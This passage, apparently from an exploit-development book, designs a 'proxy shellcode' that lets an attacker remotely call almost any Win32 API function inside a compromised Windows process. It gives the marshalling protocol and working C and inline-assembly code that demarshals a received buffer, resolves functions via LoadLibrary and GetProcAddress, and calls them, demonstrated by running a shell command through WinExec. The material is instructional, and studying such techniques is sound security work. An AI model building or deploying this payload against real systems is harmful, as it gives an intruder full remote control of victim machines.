Syscall Header | |
DLLName | |
FunctionName | |
ParameterCount | |
. . .<some more flags>. . . | |
Parameter List Entry | |
. . .<some flags>. . . | |
Size | |
Data (if the parameter is "input" or "in/out") |
An easy way to think about this is to work out what sorts of calls we will make and look at some parameter lists. We will definitely want to create and open files.
HANDLE CreateFile( LPCTSTR lpFileName, // pointer to name of the file DWORD dwDesiredAccess, // access (read-write) mode DWORD dwShareMode, // share mode LPSECURITY_ATTRIBUTES lpSecurityAttributes, // pointer to security attributes DWORD dwCreationDisposition, // how to create DWORD dwFlagsAndAttributes, // file attributes HANDLE hTemplateFile // handle to file with attributes to // copy );
We have a pointer to a null- terminated string (which can be ASCII or Unicode) followed by a literal DWORD . This gives us our first design challenge; we must differentiate between literals (things) and references (pointers to things). So let's add a flag to make the distinction between pointers and literals. The flag we'll be using is IS_PTR . If this flag is set, the parameter should be passed to the function as a pointer to data rather than a literal. This means that we push the address of the data onto the stack before calling the function rather than pushing the data itself.
We can assume that we will pass the length of each parameter in the parameter list entry as well; that way, we can pass structures as input, as we do the lpSecurityAttributes parameter.
So far we're passing a ptr flag and a data size in addition to the data, and we can already call CreateFile . There is a slight complication, however; we should probably handle the return code in some manner. Maybe we should have a special parameter list entry that tells us how to handle the returned data.
The return code for CreateFile is a HANDLE (an unsigned 4-byte integer), which means it is a thing rather than a pointer to a thing. But there's a problem here ”we're specifying all the parameters to the function as input parameters and only the return value as an output parameter, which means we can never return any data except in the return code to a function.
We can solve this by creating two more parameter list entry flags:
IS_IN : The parameter is passed as input to the function.
IS_OUT : The parameter holds data returned from the function.
The two flags would also cover a situation in which we had a value that was both input to and output from a function, such as the lpcbData parameter in the following prototype.
LONG RegQueryValueEx( HKEY hKey, // handle to key to query LPTSTR lpValueName, // address of name of value to query LPDWORD lpReserved, // reserved LPDWORD lpType, // address of buffer for value type LPBYTE lpData, // address of data buffer LPDWORD lpcbData // address of data buffer size );
This is the Win32 API function used to retrieve data from a key in the Windows registry. On input, the lpcbData parameter points to a DWORD that contains the length of the data buffer that the value should be read into. On output, it contains the length of the data that was copied into the buffer.
So, we do a quick check of some other prototypes .
BOOL ReadFile( HANDLE hFile, // handle of file to read LPVOID lpBuffer, // pointer to buffer that receives data DWORD nNumberOfBytesToRead, // number of bytes to read LPDWORD lpNumberOfBytesRead, // pointer to number of bytes read LPOVERLAPPED lpOverlapped // pointer to structure for data );
We can handle that ”we can specify an output buffer of arbitrary size, and none of the other parameters give us any problems.
A useful consequence of the way that we're bundling up our parameters is that we don't need to send 1000 bytes of input buffer over the wire when we call ReadFile ”we just say that we have an IS_OUT parameter whose size is 1000 bytes ”we send 5 bytes to read 1000, rather than sending 1005 bytes.
We must look long and hard to find a function we can't call using this mechanism. One problem we might have is with functions that allocate buffers and return pointers to the buffers that they allocated. For example, say we have a function like this:
MyStruct *GetMyStructure();
We would handle this at the moment by specifying that the return value is IS_PTR and IS_OUT and has size sizeof( struct MyStruct) , which would get us the data in the returned MyStruct , but then we wouldn't have the address of the structure so that we can free() it.
So, let's kludge our returned return value data so that when we return a pointer type we return the literal value as well. In this way, we'll always save an extra 4 bytes for the literal return code whether it's a literal or not.
That solution handles most of the cases, but we still have a few remaining. Consider the following:
char *asctime( const struct tm *timeptr );
The asctime() function returns a null-terminated string that is a maximum 24 bytes in length. We could kludge this as well by requiring that we specify a return size for any returned null-terminated string buffers. But that's not very efficient in terms of bandwidth, so, let's add a null-terminated flag, IS_SZ (the data is a pointer to a null-terminated buffer), and also a double-null terminated flag, IS_SZZ (the data is a pointer to a buffer terminated by two null bytes ”for example, a Unicode string).
We need to lay out our proxy shellcode as follows :
Get name of DLL containing function
Get name of function
Get number of parameters
Get amount of data we have to reserve for output parameters
Get function flags (calling convention, etc.)
Get parameters:
Get parameter flags ( ptr , in , out , sz , szz )
Get parameter size
( if in or inout ) Get parameter data
If not ptr , push parameter value
If ptr , push pointer to data
Decrement parameter count; if more parameters, get another parameter
Call function
Return 'out' data
We've now got a generic design for a shellcode proxy that can deal with pretty much the entire Win32 API. The upside to our mechanism is that we handle returned data quite well, and we conserve bandwidth by having the in/out concept. The downside is that we must specify the prototype for every function that we want to call, in an idl type format (which actually isn't very difficult, because you'll probably end up calling only about 40 or 50 functions).
The following code shows what the slightly cut-down proxy section of the shellcode looks like. The interesting part is AsmDemarshallAndCall . We're manually setting up most of what our exploit will do for us ”getting the addresses of LoadLibrary and GetProcAddress and setting ebx to point to the beginning of the received data stream.
// rsc.c // Simple windows remote system call mechanism #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int Marshall( unsigned char flags, unsigned size, unsigned char *data, unsigned char *out, unsigned out_len ) { out[0] = flags; *((unsigned *)(&(out[1]))) = size; memcpy( &(out[5]), data, size ); return size + 5; } //////////////////////////// // Parameter Flags ///////// //////////////////////////// // this thing is a pointer to a thing, rather than the thing itself #define IS_PTR 0x01 // everything is either in, out or in out #define IS_IN 0x02 #define IS_OUT 0x04 // null terminated data #define IS_SZ 0x08 // null short terminated data (e.g. unicode string) #define IS_SZZ 0x10 //////////////////////////// // Function Flags ////////// //////////////////////////// // function is __cdecl (default is __stdcall) #define FN_CDECL 0x01 int AsmDemarshallAndCall( unsigned char *buff, void *loadlib, void *getproc ) { // params: // ebp: dllname // +4 : fnname // +8 : num_params // +12 : out_param_size // +16 : function_flags // +20 : params_so_far // +24 : loadlibrary // +28 : getprocaddress // +32 : address of out data buffer _asm { // set up params - this is a little complicated // due to the fact we're calling a function with inline asm push ebp sub esp, 0x100 mov ebp, esp mov ebx, dword ptr[ebp+0x158]; // buff mov dword ptr [ebp + 12], 0; mov eax, dword ptr [ebp+0x15c];//loadlib mov dword ptr[ebp + 24], eax; mov eax, dword ptr [ebp+0x160];//getproc mov dword ptr[ebp + 28], eax; mov dword ptr [ebp], ebx; // ebx = dllname sub esp, 0x800; // give ourselves some data space mov dword ptr[ebp + 32], esp; jmp start; // increment ebx until it points to a '0' byte skip_string: mov al, byte ptr [ebx]; cmp al, 0; jz done_string; inc ebx; jmp skip_string; done_string: inc ebx; ret; start: // so skip the dll name call skip_string; // store function name mov dword ptr[ ebp + 4 ], ebx // skip the function name call skip_string; // store parameter count mov ecx, dword ptr [ebx] mov edx, ecx mov dword ptr[ ebp + 8 ], ecx // store out param size add ebx,4 mov ecx, dword ptr [ebx] mov dword ptr[ ebp + 12 ], ecx // store function flags add ebx,4 mov ecx, dword ptr [ebx] mov dword ptr[ ebp + 16 ], ecx add ebx,4 // in this loop, edx holds the num parameters we have left to do. next_param: cmp edx, 0 je call_proc mov cl, byte ptr[ ebx ]; // cl = flags inc ebx; mov eax, dword ptr[ ebx ]; // eax = size add ebx, 4; mov ch,cl; and cl, 1; // is it a pointer? jz not_ptr; mov cl,ch; // is it an 'in' or 'inout' pointer? and cl, 2; jnz is_in; // so it's an 'out' // get current data pointer mov ecx, dword ptr [ ebp + 32 ] push ecx // set our data pointer to end of data buffer add dword ptr [ ebp + 32 ], eax add ebx, eax dec edx jmp next_param is_in: push ebx // arg is 'in' or 'inout' // this implies that the data is contained in the received packet add ebx, eax dec edx jmp next_param not_ptr: mov eax, dword ptr[ ebx ]; push eax; add ebx, 4 dec edx jmp next_param; call_proc: // args are now set up. let's call... mov eax, dword ptr[ ebp ]; push eax; mov eax, dword ptr[ ebp + 24 ]; call eax; mov ebx, eax; mov eax, dword ptr[ ebp + 4 ]; push eax; push ebx; mov eax, dword ptr[ ebp + 28 ]; call eax; // this is getprocaddress call eax; // this is our function call // now we tidy up add esp, 0x800; add esp, 0x100; pop ebp } return 1; } int main( int argc, char *argv[] ) { unsigned char buff[ 256 ]; unsigned char *psz; DWORD freq = 1234; DWORD dur = 1234; DWORD show = 0; HANDLE hk32; void *loadlib, *getproc; char *cmd = "cmd /c dir > c:\foo.txt"; psz = buff; strcpy( psz, "kernel32.dll" ); psz += strlen( psz ) + 1; strcpy( psz, "WinExec" ); psz += strlen( psz ) + 1; *((unsigned *)(psz)) = 2; // parameter count psz += 4; *((unsigned *)(psz)) = strlen( cmd ) + 1; // parameter size psz += 4; // set fn_flags *((unsigned *)(psz)) = 0; psz += 4; psz += Marshall( IS_IN, sizeof( DWORD ), (unsigned char *)&show, psz, sizeof( buff ) ); psz += Marshall( IS_PTR IS_IN, strlen( cmd ) + 1, (unsigned char *)cmd, psz, sizeof( buff ) ); hk32 = LoadLibrary( "kernel32.dll" ); loadlib = GetProcAddress( hk32, "LoadLibraryA" ); getproc = GetProcAddress( hk32, "GetProcAddress" ); AsmDemarshallAndCall( buff, loadlib, getproc ); return 0; }
As it stands, this example performs the somewhat less-than -exciting task of demarshalling and calling WinExec to create a file in the root of the C drive. But the sample works and is a demonstration of the demarshalling process. The core of the mechanism is a little over 128 bytes. Once you add in all the surrounding patch level independence and sockets code, you still have fewer than 500 bytes for the entire proxy.